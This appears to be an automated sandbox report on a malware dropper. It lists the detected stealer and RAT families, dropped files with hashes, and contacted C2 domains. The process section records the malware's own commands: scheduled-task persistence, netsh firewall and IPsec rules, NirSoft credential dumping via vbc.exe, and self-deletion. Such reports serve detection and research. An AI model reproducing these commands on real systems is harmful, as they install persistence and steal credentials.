| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
PurpleFox
Purplefox family
RedLine
Redline family
njRAT/Bladabindi
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
Uses the VBS compiler for execution
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Help\Winlogon.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render.dll | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Cursors\WUDFhosts.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Roaming\healastounding.exe
"C:\Users\Admin\AppData\Roaming\healastounding.exe"
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\22.exe
"C:\Users\Admin\AppData\Roaming\22.exe"
C:\Users\Admin\AppData\Roaming\___11.19.exe
"C:\Users\Admin\AppData\Roaming\___11.19.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
C:\Users\Admin\AppData\Roaming\test.exe
"C:\Users\Admin\AppData\Roaming\test.exe"
C:\Users\Admin\AppData\Roaming\gay.exe
"C:\Users\Admin\AppData\Roaming\gay.exe"
C:\Users\Admin\AppData\Roaming\Opus.exe
"C:\Users\Admin\AppData\Roaming\Opus.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Users\Admin\AppData\Roaming\a.exe
"C:\Users\Admin\AppData\Roaming\a.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DHCP Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp98C5.tmp"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DHCP Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpA355.tmp"
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\240621531.txt",MainThread
C:\Users\Admin\AppData\Roaming\mediaget.exe
"C:\Users\Admin\AppData\Roaming\mediaget.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Documents and Settings\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Default User\TextInputHost.exe'" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\System32\wbem\scrcons\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "a" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\pid\a.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Documents and Settings\sihost.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6Rif1IpQLy.bat"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.86.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | yabynennet.xyz | udp |
| US | 107.178.223.183:81 | yabynennet.xyz | tcp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| US | 104.19.223.79:80 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | 183.223.178.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| US | 8.8.8.8:53 | 79.223.19.104.in-addr.arpa | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| CN | 59.56.110.231:8898 | | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| RU | 80.87.192.115:80 | | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| CA | 172.98.92.42:58491 | | tcp |
| US | 104.19.223.79:443 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
Files
memory/2228-0-0x0000000075222000-0x0000000075223000-memory.dmp
memory/2228-1-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/2228-2-0x0000000075220000-0x00000000757D1000-memory.dmp
C:\Users\Admin\AppData\Roaming\healastounding.exe
| MD5 | 6fb798f1090448ce26299c2b35acf876 |
| SHA1 | 451423d5690cffa02741d5da6e7c45bc08aefb55 |
| SHA256 | b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f |
| SHA512 | 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3 |
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
| MD5 | ed666bf7f4a0766fcec0e9c8074b089b |
| SHA1 | 1b90f1a4cb6059d573fff115b3598604825d76e6 |
| SHA256 | d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264 |
| SHA512 | d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49 |
memory/4904-22-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/4904-29-0x0000000075220000-0x00000000757D1000-memory.dmp
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
| MD5 | 0fd7de5367376231a788872005d7ed4f |
| SHA1 | 658e4d5efb8b14661967be2183cc60e3e561b2b6 |
| SHA256 | 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd |
| SHA512 | 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863 |
memory/2064-42-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/2064-51-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/2064-45-0x0000000075220000-0x00000000757D1000-memory.dmp
C:\Users\Admin\AppData\Roaming\22.exe
| MD5 | dbf9daa1707b1037e28a6e0694b33a4b |
| SHA1 | ddc1fcec1c25f2d97c372fffa247969aa6cd35ef |
| SHA256 | a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6 |
| SHA512 | 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd |
C:\Users\Admin\AppData\Roaming\___11.19.exe
| MD5 | a071727b72a8374ff79a695ecde32594 |
| SHA1 | b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc |
| SHA256 | 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745 |
| SHA512 | 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400 |
memory/8-50-0x0000000000400000-0x0000000000625000-memory.dmp
C:\Users\Admin\AppData\Roaming\test.exe
| MD5 | 7e50b292982932190179245c60c0b59b |
| SHA1 | 25cf641ddcdc818f32837db236a58060426b5571 |
| SHA256 | a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8 |
| SHA512 | c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885 |
C:\Users\Admin\AppData\Roaming\Opus.exe
| MD5 | 759185ee3724d7563b709c888c696959 |
| SHA1 | 7c166cc3cbfef08bb378bcf557b1f45396a22931 |
| SHA256 | 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641 |
| SHA512 | ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c |
C:\Users\Admin\AppData\Roaming\gay.exe
| MD5 | 8eedc01c11b251481dec59e5308dccc3 |
| SHA1 | 24bf069e9f2a1f12aefa391674ed82059386b0aa |
| SHA256 | 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d |
| SHA512 | 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc |
C:\Users\Admin\AppData\Roaming\aaa.exe
| MD5 | 860aa57fc3578f7037bb27fc79b2a62c |
| SHA1 | a14008fe5e1eb88bf46266de3d5ee5db2e0a722b |
| SHA256 | 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29 |
| SHA512 | 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1 |
C:\Users\Admin\AppData\Roaming\a.exe
| MD5 | 52cfd35f337ca837d31df0a95ce2a55e |
| SHA1 | 88eb919fa2761f739f02a025e4f9bf1fd340b6ff |
| SHA256 | 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448 |
| SHA512 | b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73 |
memory/1632-145-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Windows\SysWOW64\240621531.txt
| MD5 | 90fc82e03a29ddfb8aa574f126c85534 |
| SHA1 | b802eb0e564167738586e058b2e1516c60555e87 |
| SHA256 | 0b674c6c4631d19e21e8716cb2d57fb155c1b00999b2e694ec948207a40a8831 |
| SHA512 | 75732b3c52f9116150ecd081fd425e1733d0c1f6ab2e1b2789255df99b5f7a9fdd6fa7374a64dcb98ff69ae5c69237e8a24e560fa87cde2e91891dbcbf1ea497 |
memory/3720-165-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/4904-164-0x0000000075220000-0x00000000757D1000-memory.dmp
C:\Windows\SysWOW64\TXPlatforn.exe
| MD5 | a4329177954d4104005bce3020e5ef59 |
| SHA1 | 23c29e295e2dbb8454012d619ca3f81e4c16e85a |
| SHA256 | 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd |
| SHA512 | 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208 |
memory/3764-178-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3720-185-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/3764-189-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3720-190-0x0000000006370000-0x0000000006988000-memory.dmp
memory/3720-200-0x0000000005D70000-0x0000000005E7A000-memory.dmp
memory/3720-199-0x0000000005D50000-0x0000000005D62000-memory.dmp
memory/3720-202-0x0000000005E80000-0x0000000005EBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
| MD5 | 78d40b12ffc837843fbf4de2164002f6 |
| SHA1 | 985bdffa69bb915831cd6b81783aef3ae4418f53 |
| SHA256 | 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44 |
| SHA512 | c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79 |
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
| MD5 | 870d6e5aef6dea98ced388cce87bfbd4 |
| SHA1 | 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54 |
| SHA256 | 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0 |
| SHA512 | 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566 |
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
| MD5 | b14120b6701d42147208ebf264ad9981 |
| SHA1 | f3cff7ac8e6c1671d2c3387648e54f80957196de |
| SHA256 | d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97 |
| SHA512 | 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b |
memory/3720-232-0x0000000005F00000-0x0000000005F4C000-memory.dmp
memory/4212-238-0x0000000000400000-0x00000000019AA000-memory.dmp
C:\Users\Admin\AppData\Roaming\3.exe
| MD5 | 748a4bea8c0624a4c7a69f67263e0839 |
| SHA1 | 6955b7d516df38992ac6bff9d0b0f5df150df859 |
| SHA256 | 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e |
| SHA512 | 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd |
memory/1992-244-0x0000000000DE0000-0x0000000000E74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\X.ico
| MD5 | fb44f7af2882d222b600539171f54c1d |
| SHA1 | 0c5a1a0b1620a55a0f194464227be25a2f0347e1 |
| SHA256 | f2a78e76259bc8fd4ab6af7b4e16dfb49a10643308aca3d14c09e61ac0ebd487 |
| SHA512 | 21e906473f64303c4c8d55213ccb84f4a803c11fb5eef34ce3194adfb391ccbcc91e7c399556c7a4e4f3d33b9b19524d4499ec771ee8e1a10df26ea7cc2dcb67 |
C:\Users\Admin\AppData\Local\Temp\tmp98C5.tmp
| MD5 | 28219e12dd6c55676bdf791833067e9d |
| SHA1 | a4c854d929404e5073d16610c62dfa331c9727a0 |
| SHA256 | d3035bd90ad0e9fedeecb44da09e78421b5e6e1e0bbed1afc624750043355540 |
| SHA512 | e8c118063052002745c503b8fd0decfecf38f31e71e4dbdedc79bb8e91d443d65a33e7d983d4c0e1d6ee1eb9045100c2324b941b3bef00e69d4d91eb7d6d0161 |
memory/1516-222-0x0000000000400000-0x000000000044F000-memory.dmp
memory/1516-220-0x0000000000400000-0x000000000044F000-memory.dmp
memory/3764-191-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3720-184-0x0000000000400000-0x00000000007C2000-memory.dmp
C:\Users\Admin\AppData\Roaming\4.exe
| MD5 | e6dace3f577ac7a6f9747b4a0956c8d7 |
| SHA1 | 86c71169025b822a8dfba679ea981035ce1abfd1 |
| SHA256 | 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63 |
| SHA512 | 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268 |
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
| MD5 | 8f1c8b40c7be588389a8d382040b23bb |
| SHA1 | bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a |
| SHA256 | ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1 |
| SHA512 | 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f |
C:\Users\Admin\AppData\Local\Temp\svchos.exe
| MD5 | 3b377ad877a942ec9f60ea285f7119a2 |
| SHA1 | 60b23987b20d913982f723ab375eef50fafa6c70 |
| SHA256 | 62954fdf65e629b39a29f539619d20691332184c6b6be5a826128a8e759bfa84 |
| SHA512 | af3a71f867ad9d28772c48b521097f9bf8931eb89fd2974e8de10990241419a39ddc3c0b36dd38aac4fdf14e1f0c5e228692618e93adce958d5b5dab8940e46f |
memory/1632-143-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1632-146-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1328-115-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1328-114-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1328-112-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/4508-88-0x0000000000370000-0x0000000000382000-memory.dmp
memory/2228-89-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/1992-287-0x0000000001630000-0x000000000163C000-memory.dmp
memory/1992-288-0x0000000001640000-0x000000000164A000-memory.dmp
memory/4212-304-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-312-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-315-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-308-0x00000000060E0000-0x00000000064A2000-memory.dmp
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe (file name is GBK-encoded Chinese rendered as Latin-1: 主动防御服务模块.exe, "Active Defense Service Module")
| MD5 | 889b99c52a60dd49227c5e485a016679 |
| SHA1 | 8fa889e456aa646a4d0a4349977430ce5fa5e2d7 |
| SHA256 | 6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910 |
| SHA512 | 08933106eaf338dd119c45cbf1f83e723aff77cc0f8d3fc84e36253b1eb31557a54211d1d5d1cb58958188e32064d451f6c66a24b3963cccd3de07299ab90641 |
C:\Users\Admin\AppData\Local\Temp\tmpA355.tmp
| MD5 | 7f4b37265a0a4b0fea67999d11d911e8 |
| SHA1 | 1b8e13e6a27c3768c30cf713b79eaa8a757e1349 |
| SHA256 | 39b16b3a00b6b43c6820357127228c0768a577153014ce7b0ea3c585244dc08b |
| SHA512 | ef97ccfb663555aedc7fdc4b3ac4cd6536c80a778b4ec3bc6124a09544733988de1dac1e6a3714b0d6e8713e3523e0732d5dfcf674f2c5e1f3eadacb0c8e5e03 |
memory/1992-292-0x0000000001680000-0x000000000168C000-memory.dmp
memory/4212-295-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-301-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-298-0x00000000060E0000-0x00000000064A2000-memory.dmp
C:\ProgramData\kaosdma.txt
| MD5 | 2c807857a435aa8554d595bd14ed35d1 |
| SHA1 | 9003a73beceab3d1b1cd65614347c33117041a95 |
| SHA256 | 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b |
| SHA512 | 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9 |
memory/4212-290-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/1992-289-0x0000000001650000-0x000000000165C000-memory.dmp
memory/2064-335-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/2064-338-0x0000000075220000-0x00000000757D1000-memory.dmp
